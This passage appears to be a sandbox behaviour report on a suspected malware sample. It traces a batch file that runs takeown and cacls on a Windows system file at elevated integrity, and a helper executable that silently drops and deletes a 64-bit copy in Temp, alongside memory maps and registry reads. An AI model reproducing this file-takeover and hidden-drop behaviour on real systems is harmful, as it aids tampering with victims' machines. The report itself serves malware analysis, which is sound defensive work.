|
|
|
- |
| pagefile_0x000000007f010000 | 0x7f010000 | 0x7f032fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f038000 | 0x7f038000 | 0x7f038fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f039000 | 0x7f039000 | 0x7f03bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f03c000 | 0x7f03c000 | 0x7f03efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f03f000 | 0x7f03f000 | 0x7f03ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xfc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #43: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:12, Reason: Self Terminated |
| Monitor Duration | 00:01:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac8 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB0
0x
E8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000006b0000 | 0x006b0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x006f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00843fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00850fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00861fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00870000 | 0x0092dfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x049bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x04abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04ac3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04dc0000 | 0x050f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007edf0000 | 0x7edf0000 | 0x7eeeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eef0000 | 0x7eef0000 | 0x7ef12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef18000 | 0x7ef18000 | 0x7ef1afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef1b000 | 0x7ef1b000 | 0x7ef1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef1c000 | 0x7ef1c000 | 0x7ef1efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef1f000 | 0x7ef1f000 | 0x7ef1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 88 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x928, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x2ec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xd90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PhotoAcq.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "PhotoAcq.dll.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #45: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:40, Reason: Self Terminated |
| Monitor Duration | 00:00:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfc4 |
| Parent PID | 0xe1c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DB8
0x
DB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00797fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00920fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x01d2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7fe40000 | 0x7feacfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0xd80, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
